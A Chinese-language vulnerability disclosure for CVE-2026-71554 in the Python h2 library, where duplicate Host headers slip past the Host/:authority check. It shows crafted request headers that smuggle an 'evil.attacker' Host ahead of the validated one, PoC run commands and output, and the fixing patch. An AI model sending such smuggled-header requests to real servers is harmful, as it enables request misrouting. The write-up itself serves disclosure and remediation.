这是我发现的第一个 CVE。我发布此 PoC 是为了记录该发现,并帮助其他人理解和复现它。
CVE: CVE-2026-71554 GHSA: GHSA-6hr6-w5qg-qmwg 受影响版本: h2 <= 4.4.0 已修复版本: h2 4.4.1 严重性: 中危 (CWE-444, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L = 5.3) NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-71554
在审查 h2 的标头验证逻辑时,我注意到 src/h2/utilities.py 中的 _validate_host_authority_header() 会检查 Host 和 :authority 是否匹配——但只比较它看到的最后一个 Host 标头。如果你发送两个 Host 标头,h2 会使用第二个进行匹配检查,并将两个标头都转发给应用程序,而不会提出任何异议。
有趣的是,h2 4.4.0 已经会用 ProtocolError 拒绝重复的 Content-Length 标头。同样的修复从未应用于 Host。源码中甚至有一条 TODO 注释承认了这一确切差距:
# TODO: We should also guard against receiving duplicate Host headers,
# and against sending duplicate headers.
src/h2/utilities.py 中的 _validate_host_authority_header() 使用后值优先(last-wins)的循环,记录最后看到的 Host 值,并且只检查:
:authority 或 Host 至少存在一个它没有检查 Host 标头的数量。无论存在多少个 Host 标头,每个标头都会被向下传递到应用程序。
客户端发送:
:method: GET
:path: /
:scheme: https
host: good.internal
host: evil.attacker
h2 接受两者。应用程序收到两个 Host 标头。
降级到 HTTP/1.1 后产生:
GET / HTTP/1.1
host: good.internal
host: evil.attacker
RFC 9112 s3.2 要求服务器对任何包含多个 Host 标头的 HTTP/1.1 请求返回 400。后端的表现各不相同:
nginx — 拒绝并返回 400
Python stdlib — 接受,查询时返回第一个 Host
Werkzeug — 接受,查询时返回第一个 Host
客户端发送:
:method: GET
:path: /
:scheme: https
:authority: good.internal
host: evil.attacker <- 索引 0,第一个 Host(源站看到的值)
host: good.internal <- 索引 1,最后一个 Host(h2 验证器使用的值)
h2 验证:最后一个 Host(good.internal)== :authority(good.internal)— 通过。
应用程序收到两个 Host 标头。降级到 HTTP/1.1 后产生:
GET / HTTP/1.1
host: evil.attacker
host: good.internal
在单键查询时返回第一个 Host 的后端会将请求路由到 evil.attacker,而 h2 认为自己验证的是 good.internal。 h2 验证的内容与源站处理的内容之间出现完全的路由失步。
:method: GET
:path: /
:scheme: https
:authority: good.internal
host: evil.attacker
h2 抛出 ProtocolError。这证实了该差距仅针对重复的 Host 标头。
影响取决于部署架构:
pip install h2==4.4.0
python3 poc_h2_duplicate_host.py
CASE 1 - Two Host headers, no :authority (both forwarded)
h2 forwarded Host headers: ['good.internal', 'evil.attacker']
Resulting HTTP/1.1 request:
GET / HTTP/1.1
host: good.internal
host: evil.attacker
CASE 2 - STEALTH: :authority matches LAST Host, first Host smuggled
:authority=['good.internal'] Host(s)=['evil.attacker', 'good.internal']
h2 mismatch check PASSES (:authority == last Host).
Resulting HTTP/1.1 request:
GET / HTTP/1.1
host: evil.attacker
host: good.internal
CONTROL - Single mismatched Host vs :authority (correctly rejected)
[control] SENDER rejected: ProtocolError(...)
pip install h2==4.4.1
python3 poc_h2_duplicate_host.py
所有三个场景均抛出 ProtocolError。不会转发任何标头。
在 _validate_host_authority_header() 的现有循环中添加一个计数器:
host_header_count = 0
for header in headers:
if header[0] == b"host":
host_header_count += 1
yield header
if host_header_count > 1:
raise ProtocolError("Request header block has multiple Host headers.")
提交:https://github.com/python-hyper/h2/commit/292a40829feefda98c8509dcdbbb4a57af9bd6a6
发现并报告:Sunand Mohan (https://github.com/SunandM)